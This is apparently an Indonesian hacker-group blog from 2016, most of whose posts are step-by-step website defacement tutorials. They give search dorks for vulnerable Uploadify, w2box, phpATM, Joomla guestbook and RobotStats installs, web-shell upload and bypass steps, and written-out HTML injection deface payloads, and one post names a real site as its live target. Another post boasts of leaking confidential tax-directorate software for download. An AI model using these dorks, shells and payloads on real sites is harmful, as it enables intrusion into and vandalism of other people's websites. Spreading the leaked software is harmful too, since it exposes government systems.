Tuesday, October 18, 2016

Deface Uploadify Arbitrary File Upload (New Dork)

 Deface Uploadify Arbitrary File Upload (New Dork)

Deface Uploadify Arbitrary File Upload (New Dork)

 Garuda Security Hacker - _Tuan2Fay_ comeback :v.. pada kangen kaga sama gw ..
yosh karena kesibukan di dunia nyata ane sempet mutusin buat vakum semenetara.. tapi kaga usah khawatir ane blik lagi kok.. Leppy ane juga lagi bermasalah harus format hardisk.. ini aja ngetik pake PC Warnet :v
Kali ini gw bakal share tentang uploadify lagi nih... karena ane males ngetik tapi bahan nya udah ane siapin kok...

yg blm tau gmna cara deface dengan teknik Uploadify silahkan baca dlu tutorial sebelumnya : Tutorial Deface Dengan Teknik Uploadify

Bahan-Bahan :

Untuk bahan bahannya ane siapin dan ane upload ke web acak2an ane :v
( Klik Di Mari )

Kita pasti butuh CSRF ane juga udah siapin..
Script CSRF ( Klik Di Mari )
1. Buka notepad kamu..
2. Copy kode CSRF nya ke notepad kamu.
3. Ganti site target kamu
4. save dengan format html
5. buka CSRFnya setelah itu pilih file terus upload deh 


Baca Juga : Tutorial Deface Dengan Teknik Uploadify


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sunday, October 16, 2016

Belajar PHP dan Cara Menggunakan Method POST

Hallo Bro , Evelyn Sama Back :)
Oke Dari Pada Basa Basi Langsung ke inti nya aja :)
Seperti biasa saya Sedikit Berbagi Sedikit Ilmu saya :)
Mungkin ini bermanfaat bagi agan agan , hehehe...

Defacer Mulu Bro ?
Kapan Kamu Lengkapin HTML mu Dengan CSS ?
Kenapa Saya Buat Kata" itu , ya Karena Because.
hehehe :D
Langsung Sedot Saja Bro
Ya mungkin itu saja yang bisa saya Bagikan Untuk Agan-agan :)
Dan Maaf , Blog GSH Sekarang Jarang Update , Karena Semua Pada Sibuk Dengan Urusan Dunia Nyatanya :) 

CopyRight : Guru ku :* ( iG Langsung Follow sj bosku )

Salam Tampan & Keep Stay COOLy

Monday, October 10, 2016

Deface Metode W2box Vulnerability File Upload



Kali ini saya akan memposting hasil Riset dan Pengembangan Exploit nya sang Master yaitu E7B_404

POc Name : w2box Vulnerbility File Upload

Dork:  intext:powered by w2box

akses file : www.colicoli.il/path/data/filelu.txt

simak aja video nya biar lebih jelas



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sunday, October 2, 2016

Belajar Membuat WEB Dinamis dengan CSS



Hallo Gays.. oke sesuai judul , ntah mungkin ini menyerupai web dinamis :) Bisa di edit kok mau di tarus Script Deface Kalian lebih keren juga bisa
Jujur saya kalo liat script deface gak karuan itu pengen nabok orang na :) Cekidotz ja y Link Download Bahan Nya : Touch My Oppai Onii-Chan Di situ sudah di siapkan images sebagai bahan nya , bukan untuk coli! nah kalian nanti buat folder baru aja , nanti images itu copy ke folder kalian , di sana ada chap 1 - chap 3 :) Kalian di ajarkan membuat web dinamis itu.. #ASK A: Gan biar script deface keren make ini bisa gk ? B: Bisa gan , pokok nya kamu ngerti dasar HTML itu mudah kok A: gan background ane kok gak fix sih ( gak full BG di PC 14inc / 16inc <gede ini layar nya ) B: ini script nya

#SCRIPT FIX BACKGROUND

<style type=text/css>
body {
background-color:black;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
</style>

Wes Udahan segitu aja dulu ya :)
Re-Share ? Pliss Sertakan Sumber ya , Saya Sekolah Bayar Loh SPP nya :)
Credit Bu Yanuar (Guru Web ku ) Re-Share By Me XFear
#See You Next time :)

Saturday, October 1, 2016

Software Rahasia Direktorat Jenderal Pajak Leaked

Software Rahasia Direktorat Jenderal Pajak Leaked :p
ya kali ini aksi hacking klasik yaitu aksi pengambilan software milik pemerintah ya kurang lebih seperti aksi nya hacker terbaik di dunia Mbah Jonathan James ya kalo gak salah

kami dari Garuda Security Hacker adalah warga negara yang baik kami juga ikut Tax Amnesti untuk informasi lebih lanjut cek di http://pajak.go.id/amnestipajak namun kami melihat urusan nya sangat lambat dan memakan waktu karena rata2 softcopy wajib pajak nya banyak yang error gitu

jadi kami melakukan sesuatu yang pada akhir nya kami bisa mendapat kan software ini sehingga para member kami yang ikut TA sebelum ke kantor pajak mereka cek sendiri softcopy nya dan setelah softcopy nya valid kami langsung lapor TA kami tanpa hambatan yang memperlambat proses yaitu koreksi excel di petugas nya . 

 Bocoran Software Rahasia Direktorat Jenderal Pajak yaitu Tax Amnesti Viewer buat meneliti Softcopy Surat Pernyataan Harta tidak mau dipersulit buat pelaporan TA karena masalah softcopy ??

berkat Garuda Security Hacker kalian bisa meneliti sendiri softcopy kalian sendiri tanpa harus repot menunggu koreksi dari petugas pajak nya Have Nice Day with Us 

untuk instalasi pastikan antivirus kalian aktif dan kalian harus install Net Framework versi 4.5 terlebih dahulu 

kami bukan melakukan pengrusakan dan semacam nya kami hanya ingin membantu kalian semua agar 
proses TA nya lancar jaya tanpa hambatan lagi 

kami Garuda Security Hacker bangga karena telah Bayar Pajak :D
cekk screen shoot ini bukti bahwa sofware TA Viewer ini hanya dimiliki oleh petugas Direktorat Jenderal Pajak alias softwar ini sifat nya rahasia



gak ada kan link download nya


penampakan



DOWNLOAD SOFTWARE NYA DISINI

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Deface Metode Bypass Register Powered by phpATM


kali ini exploit hasil riset dan pengembangan  nya sang mastah yaitu E7B_404 dia emang ahli nya soal melacak-lacak exploit ini.

oke langsung saja lihat detail dan video tutorial nya

Dork : intext:"Powered by phpATM"

Step :

- Pili Target Di google
===========================
- Klik Login
===========================
- Klik register
===========================
- Klik Seperti Di Vidio
==========================
- Upload File Lu
===========================
- Bypass Shell " shell.phtml"
===============================
-akses www.coli.il/path/files/shellmu.phtml
============================================
[LIKE]

https://web.facebook.com/gshofficialpageindonesia/



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Thursday, September 29, 2016

Fake Admin Log - Honeypot By Yukinoshita47


Halo Gays...
Maaf Jarang Post , Banyak Kerjaan di REAL Life :)
Oke Langsung sikat aja , Seperti Judul Di Atas
Ini Asli Buatan Adm00n GSH , Bukan Dari Orang Homo" Laen Nya..
Fake Admin Log Honeypot Coded By Yukinoshita47  Recoded By Jurdy Kun
Cocok Untuk Ngibuli Para Defacer Defacer HOMO ...
Script Bisa Di Edit Sesuka Kalian :)
Copas ? Sertakan Sumber ya :) 


Screen Shot :



Demo : Touch Me Anata

Segitu aja Dulu ya :D
Silent Rider guud , tak berskill , tapi homo <3

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Friday, September 16, 2016

Deface Com_Guestbook Arbitrary Code Injection


kali ini saya Yukinoshita 47 ingin sharing poc hasil riset nya sang master yaitu E7B_404 dia menggunakan script jahat saya buat bahan riset nya :v


oke kali ini deface web Joomla yang menggunakan component GuestBook

udah selesai kan coli nya :D oke langsung aja kita ke tahap selanjut nya :v



Dork nya : inurl:option=com_guestbook

Exploitation : situs.co.li/[path-CMS]/index.php?option=com_guestbook
                        situs.co.li/index.php?option=com_guestbook

selanjutnya kalian dorking dulu :v 

udah nemu ? oke pertama2

Klik Add Comment

isi kolom Your Name, Your Email, URL, Title sembarangan aja trus pada kolom komentar nya di isi script jahat + script depesan kalian

Script Jahat Saya [ Jauh Lebih Keren dari JS Overlay :p ]

<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center> 

Script Depesan Saya :

<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br>  

jadi nya 


<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center>
<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br> 

seperti gambar dibawah ini


Jika Sudah Oke Klik Save Comment seperti gambar di bawah ini :


Jika muncul seperti ini berarti berhasil cukk yeayyy :D 


hahaha gampang sekali kan :D

bagi pengguna joomla component guestbook ini segera update ke versi yang paling baru ya biar gak kena tempel :v



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Heruu Dot ID | And All Member of Garuda Security Hacker

Saturday, September 10, 2016

Tutorial SQLi Injection + Install XAMPP + Install Joomla [ SQLi Injection in Localhost ]


Oke Sesuai Judul Tanpa Basa Basi :)
Query Injection : Touch Me
Tutorial By : Budi Andriyoga
Re-Tutorial : Sector.V2

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P | Budi Andriyoga

Friday, September 9, 2016

Release IMAGE PRIVACY TOOLS Ver. Garuda Security Hacker


Hallo Gays Maaf Blog GSH Jarang Update ..
Oke untung saya ada waktu luang untuk Sharing Software IMAGE PRIVACY TOOLS

Preface :
dikarenakan sekarang makin banyaknya pencurian data utamanya foto foto pribadi oleh para hacker, dengan menggunakan methode crypto locker dan meminta tebusan atas foto/data privacy.
tools ini bisa mengenkripsi file gambar / foto ke dalam extensi .syn
setelah di enkripsi dimana hanya dengan program inilah foto/data tersebut dapat di buka/dilihat.

Itu adalah keterangan Software Tersebut.

Link Download
MediaFire [Status] OK

Link Error ? Bisa Kontak Admin / Sector.V2 ( Sudah ada post nya di blog ini )
Tidak Lupa Terimakasih ke Grup 1337CyberIndo
Remake : Fear
Author  : Budi Andriyoga
ASK :
Bang Ada Source Code nya gak ? 
Tenang Ada kok ..
Cek My Github : EleynSect

Thanks.
Salam Tampan & Keep Stay Cooly


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P | Budi Andriyoga + 1337CyberIndo

Friday, September 2, 2016

Deface Robot Stats HTML Injection


Baiklah para penebas website orang dan para pencari poc deface kali ini saya ingin menjelaskan tentang salah satu teknik deface yaitu HTML Injection untuk detail nya :

Platform CMS : RobotStats 1.0
Vulnerability : HTML Injection
Tools : Amplast Buat Coli
Syarat : Sebelum Mulai silahkan coli dulu pake amplast wkwkwkwkwk
Dork : inurl:"/robotstats/admin/robots.php" dan inurl:"admin/robots.php" selanjut nya lu gunakan imajinasi cabul kalian buat ngembangin dorknya

ok langsung saja

pertama dorking dulu sambil coli pake amplas :v dan akhir nya nemu juga ne live target nya http://alpesoiseaux.free.fr

oke pertama buka 
http://situs.co.li/path-cms/admin/robots.php
contoh : http://alpesoiseaux.free.fr/robotstats/admin/robots.php

kalo vuln atau yang CMS RobotStats akan terlihat seperti gambar dibawah ini



selanjutnya pilih Modifier maka akan muncul seperti gambar dibawah ini.



kemudian pada bagian kolom yang paling atas isi dengan script HTML Injection nya 


<font color=red size=8><body bgcolor=black>KALIMAT LU<img src=URL GAMBAR LU />

contoh :

<font color=red size=8><body bgcolor=black>Injected by Yukinoshita 47<img src=http://data.whicdn.com/images/99814598/large.jpg />

kamudian letakkan script ini di form/kolom yang paling atas yang lainnya biarin aja default kemudian klik ok sesuai dengan gambar dibawah ini



dan jika berhasil maka akan muncul seperti gambar  dibawah ini

kemudian klik Retour à l'administration des robots. atau akses aja 

situs.co.li/path-cms/admin/robots.php

contoh : http://alpesoiseaux.free.fr/robotstats/admin/robots.php

dan hasil deface nya kurang lebih seperti gambar dibawah ini :v

btw poc ini bisa masuk mirror loh :v 

Deface Metode File Uploader Japan

 
Method Deface ini adalah hasil riset nya E7B_404 silahkan simak saja video berikut ini